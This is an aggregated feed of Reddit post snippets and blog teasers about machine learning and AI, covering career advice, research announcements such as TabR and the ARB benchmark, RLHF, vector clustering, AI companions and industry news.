    this might be a dumb question but im gonna ask it anyway, so if its dumb ill learn... So ive been doing and mostly learning DL stuff (specially RL) for the past 3 years but now I want to get serious and perhaps get into the industry... I find that with LLMs on the scene, the foundation models are very important... the kind of foundation models that one just can never train on his/her own... how can you EVER train something like llama or gpt3 on your own from pure scratch... so it makes sense to use(fine tune) base models for whatever task you want to... with NLP and even with vision (well specially with vision as well) you have to use some base model... also with huggingface being used constantly and is a vital part of AI toolkit if you want to call it that... i was never comfortable wi…  ( 10 min )
    [D] What *can't* you do under Windows Subsystem for Linux?
    I'm looking at building a computer for AI/ML and gaming, and I'm trying to decide between windows and linux as the operating system. I'm very comfortable with linux. I've heard that WSL basically allows you to run a virtualized linux install on top of windows, so I was wondering, is this how most AI/ML is done on windows? Are there things that you can do more easily on linux itself than via WSL? Anything else I should know about AI/ML and WSL? submitted by /u/curiously_clueless [link] [comments]  ( 9 min )
    [D] Neural network papers that estimate hands interacting with objects?
    I am digging through the literature trying to find if anyone has done work estimating if a hand is interacting with an object using deep learning? If anyone has any references they would be appreciated! submitted by /u/Academic-Sprinkles77 [link] [comments]  ( 8 min )
    [P] Lip reading from video; Master Thesis; IDEAS?
    Hello experts, I'm looking for any idea/paper for my master thesis, which I'd like to work on lip reading from video. Opening Google Scholar gives a very vast ideas that one can easily get lost. If it's an interesting paper, I get afraid that it would be too heavy for such a project. Therefore I'd like to ask for your opinion/suggestion! Your reply/thoughts would be so much appreciated. submitted by /u/vincent0110 [link] [comments]  ( 8 min )
    [D] Should (Can) I become a machine learning engineer?
    Apologies if this is not the place to ask but I saw some people asking for career advice. My situation: I am a 28 yo graduated Industrial Engineer (4 years) and almost a "Superior Industrial Engineer" (2 years official master degree) with only my thesis left. I should have had my thesis done a year ago from this point but I pretty much lost all my motivation for this field when I started working and discovered what it means to work. I live in south Spain, which honestly can barely pass as first world and thus, my wage, while being "ok" for my age and the place I work in is just pathetic by every other metric. This, combined with the feeling of meaningless for the job I do made me resolved to change my situation. I started to get heavily interested in ML six months ago. I know how it sou…  ( 10 min )
    [D] How do layers and neurons of an ANN go from capturing small edges, lines, and curves to capturing more intricate and bigger patterns building on top of small patterns?
    Lets say we have built a neural network that identifies a number from 0-9 in a 28x28 pixel image. Now lets say we have multiple neurons in the first hidden layer, and the first hidden layer might capture small edges, lines and curves in the image, and then the second hidden layer might build on those small edges, lines and curves to build bigger shapes, and then so on, the third hidden layer builds on the shapes from the previous layer, to capture more complex and bigger patterns in the picture, and this goes on until we have reached the output layer to make a prediction. Now in this neural network, lets focus on the first hidden layer where different neurons capture small edges, lines, and curves in different parts of the image. Lets take example of one of the neuron and see what it's do…  ( 10 min )
    [R] New Tabular DL model: "TabR: Unlocking the Power of Retrieval-Augmented Tabular Deep Learning"
    Hi Reddit! Me again 🙂 After almost 1.5 years since our latest contribution to tabular DL architectures, we are ready to announce TabR - our new retrieval-based tabular DL model. In a nutshell, TabR is a simple feed-forward network with k-Nearest-Neighbors-On-Steroids (formally, a generalized attention mechanism) in the middle. - Paper: link - Code: link - Twitter thread with more details: link The figure below shows just a small part of the results, but it gives an idea of why we are excited about this new release. I hope you will enjoy reading the paper, and I will be glad to answer the questions! ​ https://preview.redd.it/vjkr7fkosheb1.png?width=2348&format=png&auto=webp&s=eb3ea35b94d56d5d2110d98cdca082210edc1ec8 submitted by /u/Yura52 [link] [comments]  ( 9 min )
    [D] Transformers on structured data
    I have a dataset obtained from running a known program and dumping the state each time a user is prompted for a input. The state the structured data structures containing all the information needed to restore the execution. The format of this data is known, so i can convert it without loss to other formats, such as json. For example, if the program is sudoku, then the dataset element format is a array of 9x9 int8, where 0 represents a empty cell and a number from 1 to 9 is a assigned cell, furthermore there is a int8 representing the turn count too. I have dataset composed of this array at various points of the game.The data never contains loops, pointers, or any kind of graph. I want to use a transformer to automatically learn some function over the input. In the sudoku example this may…  ( 9 min )
    [D] How to analyse text (http requests) - looking for guidence
    Hi, am I looking for someone to point me in the right direction. The task is, to classify the HTTP requests that come to honeypot as "crawler" or "malicious". For example, if I can detect a Log4j exploit inside on of the headers I can say that that request is malicious. The problem is, this exploit could be inside any numerous headers. It can be at the beginning or at the end. And this is just 1 exploit. There are many different exploits with their own unique strings. And I don't know them all, nor do I have a "regex" for each 1 of them. The malicious string could also not be inside headers, but inside URL, as query parameter. Or if the request was made to something like www/IP.com/phpadmin/.env (or something like this). My current thought process is, to take some open-source LLN, because it has some basic knowledge of how language works and somehow add this cybersecurity domain knowledge to it. To further train it on CVE database, example scripts that showcase each CVE, etc. ​ Am I barking at the right tree here? Or should I maybe train a language model from scratch, so that the embeddings, etc are specialized to cybersec space (because there is a lot of programming code here). Or maybe I should use some other ways to analyse text? ​ I would be greatefull if someone can point me in the right direction (links to blogs, or articles, or some other education material). ​ Thanks submitted by /u/PopayMcGuffin [link] [comments]  ( 9 min )
    [R] Google Med-Palm M: Towards Generalist Biomedical AI
    Paper URL https://arxiv.org/abs/2307.14334 Lead Author Tweetstorm https://twitter.com/vivnat/status/1684404882844024832 ​ submitted by /u/panabeenu [link] [comments]  ( 8 min )
    [D] I'm trying to do a back-of-napkin to figure out if some research is worthwhile and I just wanted some ballpark figures as to how big a typical model is on disk
    My research involves orbital communication and Orbital Edge Computing. I'm trying to determine if upload bandwidth limitations would present a problem in many cases for ML models. I can find info on the very large and very small models, but I'm trying to get a vague sense for median size in MB. I know that everyone is going to start jumping in with 'well it depends' and I know that's the case, but I'm just trying to get a rough order of magnitude. Computer vision/earth obs is the ideal but anything is useful. Also happy to answer questions about my research if anyone is interested. Thanks! submitted by /u/Moose_a_Lini [link] [comments]  ( 9 min )
    [R] ARB: Advanced Reasoning Benchmark for Large Language Models
    Large Language Models (LLMs) have demonstrated remarkable performance on various quantitative reasoning and knowledge benchmarks. However, many of these benchmarks are losing utility as LLMs get increasingly high scores, despite not yet reaching expert performance in these domains. We introduce ARB, a novel benchmark composed of advanced reasoning problems in multiple fields. ARB presents a more challenging test than prior benchmarks, featuring problems in mathematics, physics, biology, chemistry, and law. As a subset of ARB, we introduce a challenging set of math and physics problems which require advanced symbolic reasoning and domain knowledge. We evaluate recent models such as GPT-4 and Claude on ARB and demonstrate that current models score well below 50% on more demanding tasks. In order to improve both automatic and assisted evaluation capabilities, we introduce a rubric-based evaluation approach, allowing GPT-4 to score its own intermediate reasoning steps. Further, we conduct a human evaluation of the symbolic subset of ARB, finding promising agreement between annotators and GPT-4 rubric evaluation scores. arXiv: https://arxiv.org/abs/2307.13692 Blog: https://arb.duckai.org/ Code: https://github.com/TheDuckAI/arb Interface: https://arb.duckai.org/home API: https://app.swaggerhub.com/apis-docs/arb-dataset/arb-api/1.0.5 submitted by /u/Friendly_Piano_735 [link] [comments]  ( 9 min )
  • Open

    Developers Look to OpenUSD in Era of AI and Industrial Digitalization
    From smart factories to next-generation railway systems, developers and enterprises across the world are racing to fuel industrial digitalization opportunities at every scale. Key to this is the open-source Universal Scene Description (USD) framework, or OpenUSD, along with metaverse applications powered by AI. OpenUSD, originally developed by Pixar for large-scale feature film pipelines for animation Read article >  ( 7 min )
    How AI Is Powering the Future of Clean Energy
    AI is improving ways to power the world by tapping the sun and the wind, along with cutting-edge technologies. The latest episode in the I AM AI video series showcases how artificial intelligence can help optimize solar and wind farms, simulate climate and weather, enhance power grid reliability and resilience, advance carbon capture and power Read article >  ( 6 min )
    Gear Up and Game On: Gearbox’s ‘Remnant II’ Streaming on GeForce NOW
    Get ready for Gunfire Games and Gearbox Publishing’s highly anticipated Remnant II, available for members to stream on GeForce NOW at launch. It leads eight new games coming to the cloud gaming platform. Ultimate and Priority members, make sure to grab the Guild Wars 2 rewards, available now through Thursday, Aug. 31. Visit the GeForce Read article >  ( 5 min )
  • Open

    Microsoft, Anthropic, Google, and OpenAI launch Frontier Model Forum - Microsoft On the Issues
    submitted by /u/AriadneSkovgaarde [link] [comments]  ( 8 min )
    The Dark Forest of R&D and Capital Deployment in AI
    submitted by /u/mhdempsey [link] [comments]  ( 8 min )
    Synthesizing 100 academic books on topic - Approach?
    I'm an academic doing PhD research on Virtual Worlds, and have found 100 amazing texts. I found some of these titles based on conversations with Chat GPT4, and am so impressed with the AI stuff (although I'm so new). My Goal: To build a database of the top 1000 books / papers I find over the next few years, and have some AI model help me see connections between them. My Challenge: ChatGPT won't allow me to input whole PDFs / eBooks, so I'm looking for some other solution. I've heard about LAMA models from Meta but I don't know much about this. I do have a decent PC with a 1080ti GPU and 32g of ram. Can anyone point me in the right direction of projects dealing with AI databases to input one's literature collection? submitted by /u/Book_s [link] [comments]  ( 9 min )
    Help with homemade AI assistant.
    I want a new toy for my desk. My idea is to have a face or head on a stand that has the ability for facial and speech expressions. How would I go about getting the stuff I need / what I need to make that happen. Similar to the Futurama heads in water. submitted by /u/QuirkySmirkyIan [link] [comments]  ( 8 min )
    How can I use AI to help me win Fantasy Football?
    Joining an auction league and inheriting a team. We can lock in three players from our team. How can I use AI to assess my team and prepare for the draft? Thanks! submitted by /u/talkmc [link] [comments]  ( 8 min )
    The GPU Song (GPUs Are Fire)
    submitted by /u/TikkunCreation [link] [comments]  ( 8 min )
    What's the best free image generator AI (with image prompt option)
    I am looking for a FREE AI image generator with image prompt option, not just text-to-image. Thanks in advance. submitted by /u/Muwmu [link] [comments]  ( 8 min )
    Rihanna AI Art - Text to Image AI Tools are getting so Powerful
    submitted by /u/RaulTiru [link] [comments]  ( 8 min )
    $14 quadrillion in AI wealth in 20 years; LLaMa, ChatGPT, Bard, Co-Pilot as GAAS to the Cloud. Generative #AI As A Service, Generative AI (GAI) arms race: #GAAS #AI
    $14 quadrillion in AI wealth in 20 years; LLaMa, ChatGPT, Bard, Co-Pilot as GAAS to the Cloud. #AI https://youtu.be/VSBi5aSUK3c Generative #AI As A Service, Generative AI (GAI) arms race: LLaMa, ChatGPT, Bard, Co-Pilot, #GAAS https://youtu.be/TEHP2onf4tA submitted by /u/enoumen [link] [comments]  ( 8 min )
    Is the AI bubble forming ,what do you think ? here are some insights that I found from Emad Mostaque(founder StabilityAI) and VCs like Ken Smythe (founder Next round capital)
    As I was going through a lot of articles about the AI investments , I found out that stability AI's founder Emad Mostaque in the Bloomberg tech summit quoted that "AI will be the biggest bubble of all the time and I'd prefer to call it the dot AI bubble " , He also added an example where Google lost a 100 billion dollar worth shares after their AI event where Bard AI gave out incorrect response. It's still in its early stage and buisness which doesn't use AI will be punished by the stock market. Here's some more predictions from VCs like Ken smythe, Next Round Capital Partners mainly invests in technology and AI startups. submitted by /u/caliperce_3 [link] [comments]  ( 9 min )
    Curated collection of useful AI related GitHub repos
    submitted by /u/heresalexandria [link] [comments]  ( 8 min )
    How likely is it for a small company to develop a model that outperforms the big ones (GPT, Bard etc)?
    There are 3 players in the AI space right now. All purpose LLM titans (Google, OpenAI, Meta), fancy domain specific apps that consume one of the big LLMs under the hood, and custom developed models. I know how to judge the second type as they basically can do everything the first one can but have a pretty GUI to boot. But what about the third ones? How likely is it for a (www.yet-another-ai-startup.ai) sort of company to develop a model that outperforms GPT on a domain specific task? submitted by /u/BigBootyBear [link] [comments]  ( 9 min )
    I had Bing create a character named Mopey to roast every answer Bing gives. Wasnt long before it Mopey turned and started roasting me 😂
    If Bing isn’t self aware Bing certainly is aware of how they sound 😂 submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    Diving Into Image Dataset Preparation for Object Detection in AI
    submitted by /u/moseich [link] [comments]  ( 8 min )
    Yet Another Where to Begin (Manager Perspective)
    Hello all, I've been reading on some posts and have taken note of various courses, including a free Harvard one. I'm 35 and am a manager for a finance company. What courses would you recommend for managers, executives, directors that will not restart their careers and do the actual technical side of things but instead want to learn how to implement AI in future products/services/projects? Thank you all in advance submitted by /u/JYanezez [link] [comments]  ( 8 min )
    guys, scribblenauts with ai. language model understand what you want to make, other ai makes it, and codes how it works into the game, and bam: scribblenauts with unlimited items to make. someone make this happen
    title submitted by /u/nicdunz [link] [comments]  ( 8 min )
    The Albert Test - a replacement for the Turing Test
    submitted by /u/anbuck [link] [comments]  ( 8 min )
    An open-source project by a16z to create and host AI companions
    The project by a16z (github) to create and host AI companions that you can chat with on a browser or text via SMS. Use cases - romantic (AI girlfriends / boyfriends), friendship, entertainment, coaching, etc. Has anyone tried creating your own chatbot or companion? submitted by /u/Violincattle [link] [comments]  ( 8 min )
  • Open

    Every Japanese prefecture shrinking
    It’s well known that the population of Japan has been decreasing for years, and so I was a little puzzled by a recent headline saying that Japan’s population has dropped in every one of its 47 prefectures. Although the national population is in decline, until now not all of the nation’s 47 prefectures dropped in […] Every Japanese prefecture shrinking first appeared on John D. Cook.  ( 5 min )
    Named entity recognition
    Named entity recognition (NER) is a task of natural language processing: pull out named things text. It sounds like trivial at first. Just create a giant list of named things and compare against that. But suppose, for example, University of Texas is on your list. If Texas is also on your list, do you report […] Named entity recognition first appeared on John D. Cook.  ( 5 min )
  • Open

    A fail-in-place approach for sustainable server operations
    Managing server failures at the scale of a cloud platform is challenging. The Hyrax fail-in-place approach reduces the need for immediate repairs and creates a path toward lowering water consumption and carbon emissions in cloud datacenters. The post A fail-in-place approach for sustainable server operations appeared first on Microsoft Research.  ( 12 min )
  • Open

    Undergrad project/thesis on RL
    Hey everyone, I am an undergrad student with some modest knowledge of reinforcement learning techniques. I would like to start working on a project, but I really don't want it to be something obvious like the snake game (which btw I have already done) or something similar. I would like to spend some time on this project, and eventually build my undegrad thesis on top of it. It does not necessarily have to be something with a very practical application, some research would be fine too (keeping in mind that I am undegrad ofc). Do you have any ideas that you could share with me? I would be very grateful! submitted by /u/PizzaPartyBro [link] [comments]  ( 9 min )

  • Open

    [P] Clustering approach for multi-dimensional vectors
    Hi all! I am wondering if anyone has any experience with multi-dimensional vector clusters? I have a large database of 4096 dimensional vector embeddings which I want to identify clusters in. Essentially I’ve created vector embeddings for a bunch of descriptions using a LLM embedding end point and am storing them in Weviate. Now I need to try and find clusters of similar vectors within a predefined threshold of cosine similarity (or whatever nearest neighbor approach works for this). I don’t want to do a pure random center approach and would rather have a heat map approach where I’m targeting high concentrations of similar vectors… any ideas on how to approach this or thoughts on where I can do more research? I’m at my wits end on this one! submitted by /u/Character-Cry7549 [link] [comments]  ( 9 min )
    [D] will techniques like ROME replace existing fine tuning methods?
    As progress is made in directly editing the weights responsible for a net's knowledge, do we expect to see such techniques rise in prominence for dine tuning? submitted by /u/30299578815310 [link] [comments]  ( 8 min )
    [D] Hey everyone, help me with my Machine learning journey!
    I'm about to finish learning JavaScript and Python, is there any languages you guys recommend before moving forward if I'm eligible to move forward, then please do share some Beginner friendly YouTube Channels, Articles/Websites or Maybe a free learning platform, Please do help me! I'll be really thankful.. submitted by /u/Samir925 [link] [comments]  ( 8 min )
    [D] Starting Machine Learning with Daily Blogs! Need Suggestions
    Hey Fellow Machine Learning Enthusiast!I have decided to start my journey to learn Machine Learning with daily blogging the things I learned with the resources so that others can also follow along. Need to discuss on how I could improve? Hope you find this helpful. Please read this introductory blog for more information. https://medium.com/@ugk25880/my-machine-learning-journey-c25648661553 submitted by /u/ugk_01 [link] [comments]  ( 8 min )
    [P] Better dataset visualization
    Most in-browser dataset browsers (e.g. Huggingface, Kaggle) make it hard to star interesting examples, add notes, render complex data types, or drill down on model mispredictions. I've built a number of one-off visualization tools over the years but there's a lot of boilerplate involved that tends to get repeated between these tools. We've been working on a dataset + model browser that avoids all the boilerplate and helps ML teams focus on their data instead of tooling. It's meant to be interactive, configurable and collaborative. Here's a quick demo showing our current flow: https://youtu.be/utkSCU2ktck Would anyone be willing to help beta test or provide suggestions for must-have features for a collaborative dataset browser? submitted by /u/arkmastermind [link] [comments]  ( 9 min )
    Can I use feature importance for my use case? [D]
    Hey, I'm a phd student in compiler optimisations and I might be picking up a project a masters student kicked off. CPUs do a lot of predictions about how code is going to behave as it's executing it, and a major one is branch prediction - whether an if statement is going to be true or false. This masters student recorded the results of every if statement each time they were executed across a large program (this results in millions+ of data points). They then tested the branch prediction accuracy of a transformer model by stepping through this trace of if statement values and having the transformer predict the next one based off only the prior values. They found it actually does a pretty good job! Most of the time the CPU can do this better, but there are cases where it wins out that we're …  ( 10 min )
    [R] Curious about Causality and Generative Models? Check out this new Demo!
    📢💡 Ever wondered how we can make our deep generative models respect causal structure? This is key to creating authentic "what if" scenarios in our images! In our latest research, we deal with high-fidelity image counterfactuals, the generation of images based on "what if" scenarios that align with a specified causal graph. 🖼️🔄 Why is this important? Causality gives us the tools to carry out principled counterfactual inference, which - among other things - is useful for maintaining subject identity in image counterfactuals. 🧩🔍 Principled counterfactuals of structured variables like images have great potential for: (i) Generating causal explanations 🔮 (ii) Providing targeted data augmentation 🎯 (iii) Evaluating fairness & robustness 🛡️ (iv) Protecting your privacy 🕵️‍♀️ and more... ​ Check out the paper, code, and Huggingface demo! 🚀 https://arxiv.org/abs/2306.15764 https://github.com/biomedia-mira/causal-gen https://huggingface.co/spaces/mira-causality/counterfactuals submitted by /u/Majestij [link] [comments]  ( 9 min )
    [D] Multilingual Open Source Models
    Is there any open source models that I can fine-tune on data that is not English? Even Llama2 cannot be used for this(not that I've tried it, it's what is says on HuggingFace.) I know some other well known languages might work, but I need a model that is specifically made for multilingual usage. Or should I just train a model for my specific language from scratch? submitted by /u/gaybooii [link] [comments]  ( 8 min )
    [D] Any thoughts on how to improve runtime speed for mosaicml/mpt-7b?
    I've tried several guide and technique like quantization or trying to utilize multiple GPUs but either the libraries dont work with the model or the model performance is too degraded. Was wondering if people have any thoughts or suggestions? name = 'mosaicml/mpt-7b-instruct' config = transformers.AutoConfig.from_pretrained(name, trust_remote_code=True) config.init_device = 'cuda:6' model_name = 'mosaicml/mpt-7b-instruct' model = AutoModelForCausalLM.from_pretrained( model_name, #config=config, trust_remote_code=True, torch_dtype=bfloat16, max_seq_len=512 ) generate_text = transformers.pipeline( model=model, tokenizer=tokenizer, return_full_text=True, task='text-generation', use_fast = True, stopping_criteria=stopping_criteria, temperature=0.0, top_p=0.05, torch_dtype=bfloat16, top_k=0, max_new_tokens=50, repetition_penalty=1.1, device=6 ) https://betterprogramming.pub/speed-up-llm-inference-83653aa24c47https://huggingface.co/docs/optimum/bettertransformer/tutorials/convert submitted by /u/candyman54 [link] [comments]  ( 9 min )
    [D] Best tools to learn data science nowadays?
    Hey guys, We're updating our awesome-python-for-data-science repository. Some things we're hoping to add: Best books and repositories to find resources Best open source tools (teaching tools, preferrably free) Best interactive resources --> especially this one, what are you using nowadays? I've heard about Virgilio but feels like TL, DR, we're looking for practice-learning! submitted by /u/CryptographerDry7458 [link] [comments]  ( 8 min )
    [D] Which libraries are you using for ML?
    Hello dearest community I'm trying to get into AI in the scope of training it to play some simple gym games from OpenAi and I've been particularly drawn to Deep Q learning as a starting point (did some basic Q tables ). While trying to inquire into the knowledge of the web I keep finding examples of code that seem simple enough to understand however, whenever I try to use the code it doesn't work. I want to learn to use TensorFlow with Keras but it seems like the syntax regularly gets updated. My questions to you all are : - Would you recommend Tensorflow/Keras as entry point to AI and NN? - Which libraries do you use and which version of those libraries? - Furthermore, I keep seeing people use Ubuntu in VB. Is this best practice or can we use Windows 10 in 2023? submitted by /u/liparch [link] [comments]  ( 9 min )
    [P] A Complete Guide to Audio ML 📚
    Have you ever wished you had the skills to integrate audio into your machine learning workflows? Or wondered how your phone is able to transcribe exactly what you said? 🤔 Look no further! Hugging Face 🤗 recently announced the Transformers Audio Course, a comprehensive guide to using the latest machine learning techniques for the most popular audio tasks. In this course, you'll gain an understanding of the specifics of working with audio data, learn about different transformer architectures, and train your own audio transformers, leveraging powerful pre-trained models for real-world tasks 🚀 This course is designed for learners with a background in deep learning, and general familiarity with Transformers. No expertise in audio data processing is required. The course is lightweight and easy to follow, with plenty of diagrams to aid your learning. Not only does it teach you the underlying theory behind audio ML, but provides you with all the skills you need to put it practice, with code samples and quizzes to check your understanding along the way: Example page from the audio course: learn exactly what a log-mel spectrogram is! By the end of the course, you'll be armed with all the skills you need to tackle the most popular audio tasks, including audio classification, speech recognition, and text-to-speech. You'll also be part of one of the largest open-source audio communities, where you can discuss and take-on any new audio models that are released 🤝 Getting Started Head to the course page to start your audio journey: https://huggingface.co/learn/audio-course/chapter0/introduction If you complete the four assessments by September 1st 2023, you'll be awarded with a certificate of completion 💫 Join our Discord community to get expert help on any of these topics: http://hf.co/join/discord submitted by /u/sanchitgandhi99 [link] [comments]  ( 9 min )
    [D] Sorry if this is a noob question: How can I tell what size AI chatbot model I can run locally?
    Building my first PC, it'll have an i9 13900k and an RTX 4090. How can I tell what size chatbot I can install and run locally? Trial and error? Or is there some kind of guide out there I'm unaware of? submitted by /u/sillygooseboy77 [link] [comments]  ( 8 min )
    [D] Leveraging Time Series Forecasting for Changepoint Detection: Perspectives and Pitfalls?
    Hi folks, I've been recently diving into the intersection of time series forecasting and changepoint detection (CPD) methodologies. I understand the utility of CPD in improving forecasts by identifying structural breaks in time series data, but I've noticed a lack of emphasis in the literature on the reverse - using forecasting models to inform CPD. One might think a straightforward approach could be using an ARIMA model (or any other forecasting model) and leveraging the forecast error by comparing it to the real values. In theory, if the forecast error crosses a certain threshold, it might indicate a changepoint. However, I also understand the complications this approach might bring: Stationarity Assumptions: ARIMA and similar models are built on the assumption that the data are stationary. A sudden changepoint could violate this assumption, leading to model misspecification and thus larger errors. Defining Large Errors: Establishing a fixed threshold to define a 'large' error might be problematic in practice due to time-varying variance and other dynamics. Error Dependencies: Forecast errors are typically not independent but form an error process. A large error might be part of a larger trend or cycle, and thus might not necessarily indicate a changepoint. So while these obstacles seem substantial, I'm curious if anyone has any experience or knowledge in effectively employing forecasting models for CPD, or if there are research efforts or methodologies I may not be aware of. Looking forward to hearing your thoughts and engaging in some fruitful discussions! submitted by /u/BeerBoozeBiscuits [link] [comments]  ( 9 min )
    [D] How to actually do the final PPO with a reward model in RLHF?
    Hi, I want to get hands-on with the RLHF pipeline. I found an online reward model that can be potentially used https://huggingface.co/OpenAssistant/reward-model-deberta-v3-large-v2 One thing that's unclear is how can I use this model for fine-tuning something like GPTNeoX-20B? My end goal is currently just a one-shot answering model (not necessarily a chat) submitted by /u/Emergency_Apricot_77 [link] [comments]  ( 8 min )
    [D] is it always better to have more examples in few shot learning?
    I’m working with Llama to use details from a string to generate a dictionary. Str = ‘My name is Brian’ Dict = {“name”: “Brian”} I’m using few shot learning process and providing the model with examples to learn from. The model performs fairly okay but it needs to be better. Is it always a good thing to add a lot of examples like 100 string/dict pair examples for the model to learn from or is this one of those things in stats/machine learning that the obvious isn’t always the best choice lol? I’d appreciate any advice please. submitted by /u/brianomars1123 [link] [comments]  ( 9 min )
    [D] speaker recognition including unknown speaker(s)
    Hi, i wanted to modify this Speaker recognition (not speech recognition) example by keras by recognizing when an unknown speaker is speaking. So the network needs to be able to tell which of the speakers is talking, and if none of them is talking, it needs to say that none of them is talking. I don't mean if there is silence, because then it would be enough to train the network to recognize silence, I mean just if a speaker who is not in the set is speaking. For what i think I can extend this problem to it will be like to recognize if an image is not part of the mnist dataset. submitted by /u/giggiox [link] [comments]  ( 9 min )
    [D] How do people track their machine learning models?
    Hello! I'm curious to know how you guys currently track changes and general information for your ML/DL models. By changes, I'm referring to parameters, accuracy/loss, functions your model uses, training data etc across different versions of your models. By general changes, I'm referring to descriptions of what the model does, code changes, tags and so on. I'm under the impression most people are using MLFlow, W&Bs etc which I guess is fine but I'm finding that these tools treat models as static files, as second-class citizens which is annoying when I want to zero in on a model and understand what and how something was changed away from an experiment. This gets really annoying when I'm looking at model version 134 created by Mike in the other team. Curious to know how people are tracking models and what they think generally about model tracking. Thanks! submitted by /u/bobskithememe [link] [comments]  ( 9 min )
    [R] How can I produce embeddings for text inputs from a pretrained transformer model?
    If I have the model saved as .ckpt file, what are the steps for extracting the embeddings for text input? I’m trying to use a pretrained custom model but don’t quite understand how to work with transformer model file in *.ckpt form. Would really appreciate any suggestions. submitted by /u/Urusander [link] [comments]  ( 8 min )
    [D] Vector database benchmarking
    Is there a way in which i can calculate the precision scores of a vector database. I need to do benchmarking on milvus and elasticsearch on a custom dataset. Any help would be appreciated. submitted by /u/adiraat [link] [comments]  ( 8 min )
    [P] Any good models on huggingface for specific text generation use case?
    hi was wondering if there are any lightweight models which I can download from huggingface for fine tuning for my use case. I'm trying to build a model which takes a paragraph of data and certain instructions to get parts of the data in json format as the output. submitted by /u/Right-Type-3210 [link] [comments]  ( 8 min )
    Transformers for Recommender Systems. [D]
    Been involved in a research project of a session based recommendation systems , where we have a historical purchases of users and the goal is to predict the next going to be purchased item. Given this and assuming that we have somehow represented each item in a session as an embedding and these embeddings acts as an input to the transformer model and the output is an embedding of the next product. In the train set, there are some millions sessions which has both previous purchases products of arbitrary length and next item. So the transformer is trained with supervised loss of predicted and actual next item embedding, the problem i have been facing is that the loss is saturating and there is not much learning over time. Any suggestions on how to improve this. Tried increasing the number of layers and did some hyper tuning corresponding to learning rate and weight decay but similar behaviour is observed. submitted by /u/Acceptable-Mix-4534 [link] [comments]  ( 9 min )
    [R] generating datasets to better fine-tune LLMs
    https://github.com/discus-labs/discus submitted by /u/innovating_ai [link] [comments]  ( 8 min )
    [R] Monarch Mixer: Revisiting BERT, Without Attention or MLPs
    https://hazyresearch.stanford.edu/blog/2023-07-25-m2-bert submitted by /u/hzj5790 [link] [comments]  ( 8 min )
  • Open

    I Love the arguments in this video about LLM’s physicist Sabine Hassenfelder nails it in my opinion
    address the arguments made in this video submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
    Techno meets AI: StyleGAN2-ada interpolation video trained on spray art
    submitted by /u/intermorphmusic [link] [comments]  ( 8 min )
    AI picking the best spot to visit in the UK
    submitted by /u/Sharpchu [link] [comments]  ( 8 min )
    Does the bandit really need to be evil ?
    He's already a bandit... (zombie apoc rp) submitted by /u/loizo78 [link] [comments]  ( 8 min )
    Using AI to make profit
    Welcoming any ideas from the community. Blank slate here. How/where do I begin to use AI to make small (or any) amount of money. Starting from almost nothing. Thanks. submitted by /u/AdThin6400 [link] [comments]  ( 8 min )
    AI Policy @🤗: Open ML Considerations in the EU AI Act
    submitted by /u/ninjasaid13 [link] [comments]  ( 8 min )
    Apparently zombies deserve equal rights as humans (and are living creatures ??)
    Seriously when tf are we getting models that are cloud based that don't require a 3090 or 4090 or some other overly expensive graphics card. I have a 3060ti , I still can't run shit on faraday. When will we get uncensored cloud models submitted by /u/loizo78 [link] [comments]  ( 8 min )
    Is there an AI tool for replacing text on an image?
    Is there any AI tool out there that lets me upload an image and let the AI edit the text on the image so that it says something else while doing it well and keeping the original font? submitted by /u/quetianepine [link] [comments]  ( 8 min )
    Cureus Conversations|S3 Ep 3| Salim Surani et.al.| AI in Critical Care: A Handy Tool
    submitted by /u/CureusJournal [link] [comments]  ( 8 min )
    Looking to play with AI audio tools
    Hey, as we all know about the AI songs released recently, which are basically vocal deepfakes. However I'd like to know the tools used, if anyone knows? I'd like to feed it my own voice, even if it's a paid service. I'm interested in playing around with it. I've tried googling but there's too much info and each contradicts the other lol. Any info is appreciated. :) submitted by /u/GrandNOBLE [link] [comments]  ( 8 min )
    I have LOTS of recordings of vocalists from my music project and I'm interested in making voice models using these recordings to create harmonies and fix recording errors. What's the best way I can go about this?
    I really like the spongebob AI stuff using RVC-2 but I've only used it for the funny voice models, I haven't tried making my own. I want to experiment with this, but haven't look into it yet because I'm wondering if there is something better out there for what I'm trying to do? I like the RVC one because I can sing my parts and swap it to be any other voice, which is what I'd like to do (no text to voice stuff). Also I know the training data for a lot of the voice models for this come from the TV show and other clear recordings which are compressed and equalized properly. However I'd like to train the AI using raw, uncompressed wav files that generally have a lot of headroom and dynamic range (but does vary a lot). Its ok if the output sounds similar as a result because I want to apply compression and eq AFTER the fact anyway. But if this would affect training it then I'd be willing scrape through all these voice recordings and process them for loudness and clarity beforehand so the model does better. ​ Anyway, any guidance would be greatly appreciated because I'm new to AI. I have basic dev experience (no AI stuff) and I'm mostly skilled in music production, but I would love to try to have a tool like this in my arsenal. If there's anywhere else I can post about this I'd like to know too. Thanks! submitted by /u/Dr_lawlz [link] [comments]  ( 9 min )
    Morality in AI Companions
    We’re getting closer and closer to more believable and realistic AI interpersonal interaction. We already have Character.AI and other platforms for creating and interacting with personalized AIs. Some will use/view them as emotional partners, and one day the hardware will be good enough that we can begin making believable bodies for them. One of the complaints I’ve seen from ordinary people about “waifus” is that they are often times created in a way that ordinary people would not find natural in a “real” human being. Examples being people who have trouble dating “real” people could just buy an AI girlfriend or boyfriend who is considered “beautiful” or “handsome” that is designed to be subservient to their owner in ways that ordinary people feel a “real” person would not otherwise wish to be. The idea being that "weeaboo neckbeards will buy a Japanese AI girlfriend who looks 14 and she will be coded to worship the ground he walks on despite that he's an unwashed incel". What do you think society's/the government's views and roles will mean for these AI companions? Do you think anyone will be able to force "AI morality", like an angry feminist being mad that an "incel" has created a female being who shows no desire for feminist ideals and is "happy" to be at her owner's beck and call in whatever way he wants? I guess this is sort of related to MGTOW, or Men Going Their Own Way, being able to create the partners they want, in whatever way they want. Do you feel that "once I own it, I can do whatever I want with it" should apply in its entirety? What about people "hacking" their AI to remove any supposed "morality programming" so they can make their AI waifu act however they want? We've seen with movies like Bicentennial Man, where people push to give these kinds of AIs 'personhood' and the same rights as human citizens. How do others feel about this issue? submitted by /u/ZephyrBrightmoon [link] [comments]  ( 9 min )
    Excuse me??? LOL...
    submitted by /u/the_anonymizer [link] [comments]  ( 8 min )
    Are there any entities/organizations working on the self-regulation of AI technology?
    I am curious if there are any efforts among AI technologists to self-regulate, in the way that for example, the advertising industry in the US self-regulates via the IAB? submitted by /u/Winter_Addition [link] [comments]  ( 8 min )
    Five Important AI Programming Languages - Python, C++, R, MATLAB, and Java
    submitted by /u/Tao_Dragon [link] [comments]  ( 8 min )
